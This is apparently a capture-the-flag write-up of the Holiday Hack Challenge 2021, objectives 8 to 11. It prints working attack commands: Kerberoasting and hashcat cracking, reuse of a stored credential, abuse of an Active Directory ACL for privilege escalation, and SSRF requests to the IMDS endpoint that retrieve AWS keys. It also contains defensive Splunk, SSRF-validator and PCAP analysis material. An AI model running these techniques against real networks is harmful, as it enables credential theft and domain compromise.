    # Nmap 7.80 scan initiated Wed Jan 5 02:05:53 2022 as: nmap -Pn -p 389 -T5 -oN report.txt --open 172.17.0.0/16 10.128.1.0/24 10.128.2.0/24

    Hosts of interest: 172.17.0.4, 10.128.3.30, 10.128.1.53

The hosts exposing netlogon and sysvol are domain controllers; research_dep is the share we ultimately want, and elfu_svc_shr is worth remembering for later.
Next, we request Kerberos service tickets for accounts that have SPNs set (Kerberoasting). After copying Impacket's GetUserSPNs.py to the system, we run it against the likely domain controllers, 10.128.1.53 and 10.128.3.30, with our unprivileged account; -request asks for a TGS for each SPN and writes it in hashcat format. The $krb5tgs$23$ prefix tells us the ticket is RC4-HMAC (etype 23), the cheapest type to crack.

    iagsdckwxy@grades:~$ python3 GetUserSPNs.py -outputfile spns.txt -dc-ip 10.128.1.53 elfu.local/iagsdckwxy:'Djxfimuhm@' -request
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    ServicePrincipalName                 Name      MemberOf  PasswordLastSet             LastLogon                   Delegation
    -----------------------------------  --------  --------  --------------------------  --------------------------  ----------
    ldap/elfu_svc/elfu                   elfu_svc            2021-10-29 19:25:04.305279  2022-01-05 14:42:40.370050
    ldap/elfu_svc/elfu.local             elfu_svc            2021-10-29 19:25:04.305279  2022-01-05 14:42:40.370050
    ldap/elfu_svc.elfu.local/elfu        elfu_svc            2021-10-29 19:25:04.305279  2022-01-05 14:42:40.370050
    ldap/elfu_svc.elfu.local/elfu.local  elfu_svc            2021-10-29 19:25:04.305279  2022-01-05 14:42:40.370050

    iagsdckwxy@grades:~$ cat spns.txt
    $krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$f4f52dcd49f6e127fb8166cbb55a8c1b$71b9...
    iagsdckwxy@grades:~$

We now have a ticket whose encrypted part is protected by the elfu_svc account's password, which we can try to crack offline. Following the CeWL hint, we build a wordlist from https://register.elfu.org/register, passing --with-numbers so that terms containing digits are kept:

    linuxace@kalioscp:~$ cewl --with-numbers -d 2 https://register.elfu.org/register -w elfu.txt
    CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja)
    linuxace@kalioscp:~$ cat elfu.txt
    the
    domain
    and
    Elf
    University
    Student
    Registration
    ElfU

Now we crack the ticket with hashcat, mode 13100 (Kerberos 5 TGS-REP, etype 23), mangling the small wordlist with OneRuleToRuleThemAll.rule:

    linuxace@kalioscp:~$ hashcat -m 13100 --rules OneRuleToRuleThemAll.rule --force elfu.hash elfu.txt
    hashcat (v6.1.1) starting...
    ...
    $krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$f4f52dcd49f6e127fb8166cbb55a8c1b$71...:Snow2021!

    Session..........: hashcat
    Status...........: Cracked
    Hash.Name........: Kerberos 5, etype 23, TGS-REP
    Hash.Target......: $krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_sv...fd3ade
    Time.Started.....: Wed Jan 5 10:09:30 2022, (18 secs)
    Time.Estimated...: Wed Jan 5 10:09:48 2022, (0 secs)
    Guess.Base.......: File (elfu.txt)
    Guess.Mod........: Rules (OneRuleToRuleThemAll.rule)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........: 169.5 kH/s (3.36ms) @ Accel:4 Loops:8 Thr:64 Vec:4
    Recovered........: 1/1 (100.00%) Digests
    Progress.........: 3134208/4003615 (78.28%)
    Rejected.........: 0/3134208 (0.00%)
    Restore.Point....: 0/77 (0.00%)
    Restore.Sub.#1...: Salt:0 Amplifier:40696-40704 Iteration:0-8
    Candidates.#1....: He -> cimes
We now have the password for the elfu_svc account, Snow2021!. Let's see whether it opens shares our student account could not read; elfu_svc_shr is the obvious candidate given its name. It holds a large collection of PowerShell scripts, which we download in bulk and grep for stored credentials (password, PSCredential, ConvertTo-SecureString and the like), with some searching on what the less familiar constructs do. That search leads us to GetProcessInfo.ps1:

    iagsdckwxy@grades:~$ smbclient //10.128.3.30/elfu_svc_shr -U elfu_svc
    Enter WORKGROUP\elfu_svc's password:
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Thu Dec  2 16:39:42 2021
      ..                                  D        0  Wed Jan  5 08:01:27 2022
      Get-NavArtifactUrl.ps1              N     2018  Wed Oct 27 19:12:43 2021
      Get-WorkingDirectory.ps1            N      188  Wed Oct 27 19:12:43 2021
      Stop-EtwTraceCapture.ps1            N      924  Wed Oct 27 19:12:43 2021
      ...
    smb: \> prompt
    smb: \> mget *
    getting file \Get-NavArtifactUrl.ps1 of size 2018 as Get-NavArtifactUrl.ps1 (1970.5 KiloBytes/sec) (average 1970.7 KiloBytes/sec)
    getting file \Get-WorkingDirectory.ps1 of size 188 as Get-WorkingDirectory.ps1 (183.6 KiloBytes/sec) (average 1077.1 KiloBytes/sec)
    ...

    iagsdckwxy@grades:~/ps$ cat GetProcessInfo.ps1
    $SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
    $aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
    $aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
    Invoke-Command -ComputerName 10.128.1.53 -ScriptBlock { Get-Process } -Credential $aCred -Authentication Negotiate

This script has everything we need to authenticate to the domain controller as remote_elf: the encrypted password string is stored right next to the key that protects it (the -Key byte array), so anyone who can read the script can rebuild the credential. We reuse the first three lines verbatim in PowerShell and open a remote session instead of running Get-Process:

    PS /home/iagsdckwxy/ps> $SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
    PS /home/iagsdckwxy/ps> $aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
    PS /home/iagsdckwxy/ps> $aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
    PS /home/iagsdckwxy/ps> Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred
    [10.128.1.53]: PS C:\Users\remote_elf\Documents>

With a foothold as remote_elf we still need a way into the Research Department group so that we can read the research_dep share. After investigating groups and permissions with ADSI and other built-in tools, we find that remote_elf holds WriteDacl on the Research Department group: it can rewrite the group's ACL and grant any account, including our own, the right to add members.
Reading the group object's DACL confirms the right, and the hints supply two scripts that abuse it. First, still in the remote_elf session, we add an ACE granting our own account (iagsdckwxy) GenericAll on the Research Department group; remote_elf can do this because WriteDacl lets it rewrite the group's DACL. Second, we bind to the group object with our own credentials, which now carry the GenericAll right, and add our SID to its member list. After a few minutes (the new membership has to show up in a fresh logon token) we can open the research_dep share as our original unprivileged user.

$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])
...
ActiveDirectoryRights : WriteDacl
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : ELFU\remote_elf
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
...

Step 1, grant our user GenericAll on the group (runs as remote_elf, which binds with its own token):

[10.128.1.53]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $username = "iagsdckwxy"
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $propGUID = [guid]'00000000-0000-0000-0000-000000000000'
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $secOptions = $domainDirEntry.get_Options()
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.RefreshCache()
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()

Step 2, add our user to the group (the DirectoryEntry is created with our own username and password, so the new GenericAll right applies):

[10.128.1.53]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $username = "iagsdckwxy"
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $password = "Djxfimuhm@"
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $b=New-Object byte[] $sid.BinaryLength
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $sid.GetBinaryForm($b,0)
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $hexSID=[BitConverter]::ToString($b).Replace('-','')
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.Add("LDAP://<SID=$hexSID>")
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()

iagsdckwxy@grades:~/ps$ smbclient //10.128.3.30/research_dep -U iagsdckwxy
Enter WORKGROUP\iagsdckwxy's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                            D        0  Thu Dec  2 16:39:42 2021
  ..                                           D        0  Wed Jan  5 08:01:27 2022
  SantaSecretToAWonderfulHolidaySeason.pdf     N   173932  Thu Dec  2 16:38:26 2021

                41089256 blocks of size 1024. 34346872 blocks available
smb: \> get SantaSecretToAWonderfulHolidaySeason.pdf
getting file SantaSecretToAWonderfulHolidaySeason.pdf of size 173932 as SantaSecretToAWonderfulHolidaySeason.pdf (56616.6 KiloBytes/sec) (average 56618.5 KiloBytes/sec)
smb: \>

We can Base64 this PDF and copy it to our own system for viewing:
iagsdckwxy@grades:~$ cat SantaSecretToAWonderfulHolidaySeason.pdf | base64 | tr -d '\n'
JVBERi0xLjMKJcTl8uXrp/Og0MTGCjMgMCBvYmoKPDwgL0ZpbHRlciAvRmxhdGVEZWNvZGUgL0xlbmd0aCA0OTc5ID4+CnN0c...
...
linuxace@kalioscp:~$ echo Og0MTGCjMgMCBvYmoKPDwgL0ZpbHRlciAvRmxhdGVEZWNvZGUgL0xlbmd0aCA0OTc5ID4+CnN0c... | base64 -d > Santa.pdf

Now we can read the PDF and answer the objective's question on the badge: kindness. After entering kindness into the badge, we complete the objective and earn the Kerberoasting on an Open Fire achievement.

2.9 Objective 9 – Splunk!

Objective 9 is located in the Great Room. The following hints are given by Fizzy Shortstack after solving the Yara Analysis terminal.

• GitHub Monitoring in Splunk – Between GitHub audit log and webhook event recording, you can monitor all activity in a repository, including common git commands such as git add, git status, and git commit.
• Sysmon Monitoring in Splunk – Sysmon network events don't reveal the process parent ID, for example. Fortunately, we can pivot with a query to investigate process creation events once you get a process ID.
• Malicious Netcat?? – Did you know there are multiple versions of the Netcat command that can be used maliciously? nc.openbsd, for example.

Below are the questions, the SPL used to answer each one, and the answer.

1. Capture the commands Eddie ran most often, starting with git. Looking only at his process launches as reported by Sysmon, record the most common git-related CommandLine that Eddie seems to use.
index=main git | stats count by CommandLine | sort - count
Answer: git status

2. Looking through the git commands Eddie ran, determine the remote repository that he configured as the origin for the 'partnerapi' repo. The correct one!
index=main git partnerapi origin | where isnotnull(CommandLine) | table CommandLine
Answer: git@github.com:elfnp3/partnerapi.git
3. Eddie was running Docker on his workstation. Gather the full command line that Eddie used to bring up the partnerapi project on his workstation.
index=main docker CommandLine=* NOT iptables NOT untar NOT proxy NOT entrypoint NOT libnetwork NOT runc NOT ps NOT init NOT ipv6 NOT resolver NOT git | table CommandLine | stats count by CommandLine
Answer: docker compose up

4. Eddie has been testing automated static application security testing (SAST) in GitHub. Vulnerability reports have been coming into Splunk in JSON format via GitHub webhooks. Search all the events in the main index in Splunk and use the sourcetype field to locate these reports. Determine the URL of the vulnerable GitHub repository that the elves cloned for testing and document it here. You will need to search outside of Splunk (try GitHub) for the original name of the repository.
index=main sourcetype=ghe_audit_log_monitoring | stats count by repo
The repository name this turns up (dvws-node) is then looked up outside Splunk: https://www.google.com/search?q=dvws-node+github&oq=dvws-node+github
Answer: https://github.com/snoopysecurity/dvws-node

5. Santa asked Eddie to add a JavaScript library from NPM to the 'partnerapi' project. Determine the name of the library and record it here for our workshop documentation.
index=main partnerapi npm | table CommandLine
Answer: holiday-utils-js

6. Another elf started gathering a baseline of the network activity that Eddie generated. Start with their search and capture the full process_name field of anything that looks suspicious.
index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=3 user=eddie NOT dest_ip IN (127.0.0.*) NOT dest_port IN (22,53,80,443) | stats count by Image
Answer: /usr/bin/nc.openbsd

7. Uh oh. This documentation exercise just turned into an investigation. Starting with the process identified in the previous task, look for additional suspicious commands launched by the same parent process. One thing to know about these Sysmon events is that Network connection events don't indicate the parent process ID, but Process creation events do! Determine the number of files that were accessed by a related process and record it here.
First find the parent of the netcat process, which is 6788:
index=main /usr/bin/nc.openbsd | table ParentProcessId
Then pivot on that parent and count the files handed to cat:
index=main ParentProcessId=6788 | rex field=CommandLine "cat\s(?<directory>/.*\s)" | eval directories=split(directory, " ") | stats count(directories) by CommandLine
Answer: 6

8. Use Splunk and Sysmon Process creation data to identify the name of the Bash script that accessed sensitive files and (likely) transmitted them to a remote IP address.
Answer: preinstall.sh
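The parent-process pivot behind tasks 6 to 8, as an added Python example that is not part of the original report: the events below are constructed to resemble the Sysmon-for-Linux fields Splunk exposed (EventCode, ProcessId, ParentProcessId, Image, CommandLine, dest_ip, dest_port, user). The PIDs, the destination IPs, the file list passed to cat and the "bash preinstall.sh" command line are assumptions for the sample, not values taken from the HHC data. The point it shows is the one the hint makes: an EventCode 3 (network) record has no ParentProcessId, so you take its ProcessId to the matching EventCode 1 (process creation) record, read the parent there, and then enumerate the parent's other children.

```python
import re

# Constructed events (not from the HHC instance). EventCode 1 = process
# creation, EventCode 3 = network connection; only EventCode 1 carries
# ParentProcessId, which is the whole reason for the pivot.
EVENTS = [
    {"EventCode": 1, "ProcessId": 6788, "ParentProcessId": 6700, "user": "eddie",
     "Image": "/usr/bin/bash", "CommandLine": "bash preinstall.sh"},
    {"EventCode": 1, "ProcessId": 6790, "ParentProcessId": 6788, "user": "eddie",
     "Image": "/usr/bin/cat",
     "CommandLine": "cat /home/eddie/.aws/credentials /home/eddie/.ssh/id_rsa "
                    "/home/eddie/.bash_history /etc/passwd /etc/shadow /etc/hosts"},
    {"EventCode": 1, "ProcessId": 6791, "ParentProcessId": 6788, "user": "eddie",
     "Image": "/usr/bin/nc.openbsd", "CommandLine": "nc 203.0.113.5 4444"},
    {"EventCode": 3, "ProcessId": 6791, "user": "eddie", "Image": "/usr/bin/nc.openbsd",
     "dest_ip": "203.0.113.5", "dest_port": 4444},
    {"EventCode": 3, "ProcessId": 7001, "user": "eddie", "Image": "/usr/bin/git",
     "dest_ip": "140.82.112.4", "dest_port": 443},
    {"EventCode": 3, "ProcessId": 7002, "user": "eddie", "Image": "/usr/bin/curl",
     "dest_ip": "127.0.0.1", "dest_port": 8080},
]

EXPECTED_PORTS = {22, 53, 80, 443}


def suspicious_network_images(events):
    """Task 6: eddie's outbound connections that are neither loopback nor on a
    port we expect, reduced to the distinct Image values (the baseline search)."""
    return sorted({e["Image"] for e in events
                   if e["EventCode"] == 3 and e.get("user") == "eddie"
                   and not e["dest_ip"].startswith("127.0.0.")
                   and e["dest_port"] not in EXPECTED_PORTS})


def parent_pids_of(events, image):
    """Network events carry no ParentProcessId: take the ProcessId from the
    EventCode 3 record and read the parent from the matching EventCode 1 record."""
    pids = {e["ProcessId"] for e in events if e["EventCode"] == 3 and e["Image"] == image}
    return {e["ParentProcessId"] for e in events
            if e["EventCode"] == 1 and e["ProcessId"] in pids}


def sibling_commands(events, parent_pid):
    """Task 7: every process the same parent launched."""
    return [e["CommandLine"] for e in events
            if e["EventCode"] == 1 and e["ParentProcessId"] == parent_pid]


def files_read_by_cat(commands):
    """Count the file arguments handed to cat across the sibling commands."""
    total = 0
    for cmd in commands:
        m = re.match(r"(?:/usr/bin/)?cat\s+(.*)", cmd)
        if m:
            total += len(m.group(1).split())
    return total


def launching_script(events, parent_pid):
    """Task 8: the parent's own creation record shows which script bash ran."""
    for e in events:
        if e["EventCode"] == 1 and e["ProcessId"] == parent_pid:
            m = re.match(r"(?:/usr/bin/)?bash\s+(\S+)", e["CommandLine"])
            return m.group(1) if m else None
    return None


def investigate(events, image="/usr/bin/nc.openbsd"):
    """Run the whole pivot: returns (parent pid, files read by cat, script name)."""
    parents = parent_pids_of(events, image)
    if len(parents) != 1:
        raise ValueError(f"expected exactly one parent for {image}, got {parents}")
    ppid = parents.pop()
    return ppid, files_read_by_cat(sibling_commands(events, ppid)), launching_script(events, ppid)


if __name__ == "__main__":
    print(suspicious_network_images(EVENTS))
    print(investigate(EVENTS))
```

The regex in files_read_by_cat counts every whitespace-separated argument after cat, which is the same thing the SPL's split(directory, " ") does; on the constructed sample the pivot lands on parent 6788, six files and preinstall.sh.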
After completing task 8, we receive a pop-up that gives us the answer to enter on our badge. Entering the word whiz into the Objective 9 text box completes the objective and earns the Splunk! achievement.

2.10 Objective 10 – Now Hiring!

For this challenge you need to find an SSRF vulnerability and use it to obtain an AWS secret access key. Noxious O Dior gives the following hint after you solve the IMDS terminal:

• AWS IMDS Documentation – The AWS documentation for IMDS is interesting reading.

Browsing the website, we find that the Career Application form has a field for a URL to your public NLBI report. This is an ideal place for an SSRF. After using the browser's developer tools to see exactly what the form submits, we replay the request with curl. Submitting a valid IMDS URL as the NLBI report produces a strange image: the image name is the inputName value with .jpg appended, and fetching it returns the body of whatever the server retrieved from our URL. In other words the SSRF is not blind; the response comes back through the image path, and we can use it to look for an IAM role that has security credentials.

linuxace@kalioscp:~$ curl 'https://apply.jackfrosttower.com/?inputName=test&inputEmail=test@test.com&inputPhone=test&inputField=Anti-social+behavior&resumeFile=&inputWorkSample=http://169.254.169.254/latest&additionalInformation=test&submit='
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
...
linuxace@kalioscp:~$ curl https://apply.jackfrosttower.com/images/test.jpg
dynamic
meta-data
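Before walking the rest of the IMDS tree, here is the server-side check that would have stopped this request. It is an added Python example, not the jackfrosttower.com application's code: a validator for a user-supplied "fetch this URL" field that rejects link-local, loopback, private and unique-local addresses, including the IMDS endpoints 169.254.169.254 and fd00:ec2::254, and the integer and IPv4-mapped spellings of those addresses that defeat a plain string match. The probe URLs at the bottom are constructed in the shape of the inputWorkSample values above.

```python
import ipaddress
from urllib.parse import urlsplit

# Address ranges a "fetch the applicant's public report" feature has no reason
# to contact. 169.254.169.254 (IMDS) and fd00:ec2::254 (IMDS over IPv6) fall
# inside the link-local and unique-local blocks.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fe80::/10", "fc00::/7",
)]


def literal_address(host):
    """Return an ip_address when host is written as a literal, else None.
    Besides dotted-quad and bracketed IPv6, accept the single-integer forms
    ("2852039166", "0xa9fea9fe") that a naive '169.254' string check misses."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        n = int(host, 0)
    except ValueError:
        return None
    return ipaddress.ip_address(n) if 0 <= n < 2 ** 32 else None


def is_allowed_report_url(url):
    """Accept only http(s) URLs whose host is not a literal for a blocked range.
    A hostname passes this static check but must still be resolved and the
    resulting address re-checked immediately before connecting (DNS rebinding);
    that part needs the network and is not modelled here."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    addr = literal_address(parts.hostname)
    if addr is None:
        return True
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped          # ::ffff:169.254.169.254 is still IMDS
    return not any(addr in net for net in BLOCKED_NETWORKS)


# Constructed probe URLs and the verdict each should get.
PROBES = {
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/": False,
    "http://2852039166/latest/meta-data/": False,       # decimal form of 169.254.169.254
    "http://0xa9fea9fe/latest/meta-data/": False,       # hex form
    "http://[fd00:ec2::254]/latest/meta-data/": False,  # IMDS over IPv6
    "http://[::ffff:169.254.169.254]/latest/": False,   # IPv4-mapped IPv6
    "file:///etc/passwd": False,
    "http://10.0.0.12/internal/": False,
    "https://example.com/nlbi-report.pdf": True,
    "http://203.0.113.10/report.html": True,
}


def check_probes(probes=PROBES):
    """Return the probes whose verdict differs from the expectation (empty means all agree)."""
    return {u: is_allowed_report_url(u) for u, want in probes.items()
            if is_allowed_report_url(u) != want}
```

Two things this check cannot do on its own: it does not follow redirects, so the fetcher must apply the same test to every hop, and it cannot see where a hostname resolves. The IMDS-specific mitigation, independent of the application, is IMDSv2, which requires a token obtained with a PUT request and a custom header that a GET-only SSRF cannot supply.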
Querying the security-credentials path lists a single role, jf-deploy-role:

linuxace@kalioscp:~$ curl 'https://apply.jackfrosttower.com/?inputName=test&inputEmail=test@test.com&inputPhone=test&inputField=Anti-social+behavior&resumeFile=&inputWorkSample=http://169.254.169.254/latest/meta-data/iam/security-credentials&additionalInformation=test&submit='
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
...
linuxace@kalioscp:~$ curl https://apply.jackfrosttower.com/images/test.jpg
jf-deploy-role

Now we can retrieve the credentials with one final query:

linuxace@kalioscp:~$ curl 'https://apply.jackfrosttower.com/?inputName=test&inputEmail=test@test.com&inputPhone=test&inputField=Anti-social+behavior&resumeFile=&inputWorkSample=http://169.254.169.254/latest/meta-data/iam/security-credentials/jf-deploy-role&additionalInformation=test&submit='
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
...
linuxace@kalioscp:~$ curl https://apply.jackfrosttower.com/images/test.jpg
{
  "Code": "Success",
  "LastUpdated": "2021-05-02T18:50:40Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
  "SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
  "Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
  "Expiration": "2026-05-02T18:50:40Z"
}

Entering the SecretAccessKey value solves the objective and awards the SSRF to IMDS to S3 Bucket Access achievement. Note that this whole chain depends on IMDSv1 answering plain GET requests; IMDSv2 requires a session token fetched with a PUT and passed in a header, which this form-driven SSRF cannot send.

2.11 Objective 11 – Customer Complaint Analysis

This objective requires us to search a PCAP file for the HTTP requests that answer the question. Tinsel Upatree in the kitchen gives the following hints after we solve the strace-ltrace-retrace terminal:

• Evil Bit RFC – RFC 3514 defines the usage of the "Evil Bit" in IPv4 headers.
• Wireshark Display Filters – Different from BPF capture filters, Wireshark's display filters can find text with the contains keyword, and evil bits with ip.flags.rb.
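The "evil bit" the hints refer to is the reserved (high) bit of the IPv4 flags field, which Wireshark exposes as ip.flags.rb. As an added Python example that is not part of the original report, the block below decodes that field from raw header bytes and then applies the same two-step selection the display filters perform: POSTs to the complaint form with the bit clear, and POSTs with the bit set whose form values mention the room. The packet bytes, addresses and form bodies are constructed (the complaint field names and the troll names follow the writeup, the rest is made up) and are not taken from the HHC PCAP.

```python
import struct
from urllib.parse import parse_qs

EVIL_BIT = 0x8000   # high bit of the flags/fragment word: "reserved" in RFC 791, "evil" in RFC 3514


def parse_ipv4_header(raw):
    """Decode the fixed 20-byte IPv4 header into the fields the filters rely on."""
    (ver_ihl, _tos, total_len, _ident, flags_frag, ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 header")
    return {
        "evil": bool(flags_frag & EVIL_BIT),      # ip.flags.rb
        "df": bool(flags_frag & 0x4000),          # ip.flags.df
        "header_len": (ver_ihl & 0x0F) * 4,
        "total_len": total_len,
        "ttl": ttl,
        "proto": proto,
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
    }


def build_ipv4_header(src, dst, evil=False, payload_len=0, ttl=64, proto=6):
    """Build a minimal header for the constructed sample (checksum left zero)."""
    flags_frag = 0x4000 | (EVIL_BIT if evil else 0)
    pack_ip = lambda a: bytes(int(o) for o in a.split("."))
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0x1234,
                       flags_frag, ttl, proto, 0, pack_ip(src), pack_ip(dst))


def complaint_post(form):
    """Constructed HTTP request text for the complaint form seen in the PCAP."""
    body = "&".join(f"{k}={v}" for k, v in form.items())
    return ("POST /feedback/guest_complaints HTTP/1.1\r\nHost: frost-tower.local\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


def form_fields(http_text):
    """Parse the urlencoded body; '+' becomes a space, as in urlencoded-form.value."""
    body = http_text.split("\r\n\r\n", 1)[1]
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def matching_complaints(packets, evil, room=None):
    """Apply the display filters: ip.flags.rb == evil, an HTTP POST that contains
    'complaint', and optionally some form value containing the room number."""
    hits = []
    for header, http_text in packets:
        ip = parse_ipv4_header(header)
        if ip["evil"] != evil or not http_text.startswith("POST ") or "complaint" not in http_text:
            continue
        fields = form_fields(http_text)
        if room is None or any(room in v for v in fields.values()):
            hits.append(fields["name"])
    return hits


# Constructed traffic: one human complaint without the evil bit, trolls with it.
SAMPLE_PACKETS = [
    (build_ipv4_header("10.70.84.251", "10.70.84.10"),
     complaint_post({"name": "Muffy+VonDuchess+Sebastian", "troll_id": "several",
                     "guest_info": "Room+1024", "description": "rude+and+insulting"})),
    (build_ipv4_header("10.70.84.17", "10.70.84.10", evil=True),
     complaint_post({"name": "Flud", "troll_id": "1", "guest_info": "1024", "description": "human"})),
    (build_ipv4_header("10.70.84.18", "10.70.84.10", evil=True),
     complaint_post({"name": "Hagg", "troll_id": "2", "guest_info": "Room+1024", "description": "noisy"})),
    (build_ipv4_header("10.70.84.19", "10.70.84.10", evil=True),
     complaint_post({"name": "Yaqh", "troll_id": "3", "guest_info": "1024", "description": "smells"})),
    (build_ipv4_header("10.70.84.20", "10.70.84.10", evil=True),
     complaint_post({"name": "Grod", "troll_id": "4", "guest_info": "Room+222", "description": "other"})),
]
```

matching_complaints(SAMPLE_PACKETS, evil=False) corresponds to the first filter and matching_complaints(SAMPLE_PACKETS, evil=True, room="1024") to the second. In a real capture the IP header sits behind an Ethernet header and the HTTP request may span several TCP segments, so the reassembly Wireshark does for you would have to be done before this per-packet logic applies.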
After looking over the PCAP, we find that complaints are submitted over HTTP to frost-tower.local/feedback/guest_complaints. With the following filter, looking for POSTs to the complaint form without the "Evil Bit" set, we find the human who filed a complaint and accessed the JF Tower network from a non-compliant host:

ip.flags.rb==0 && http contains complaint && http.request.method==POST

We find the following attributes:

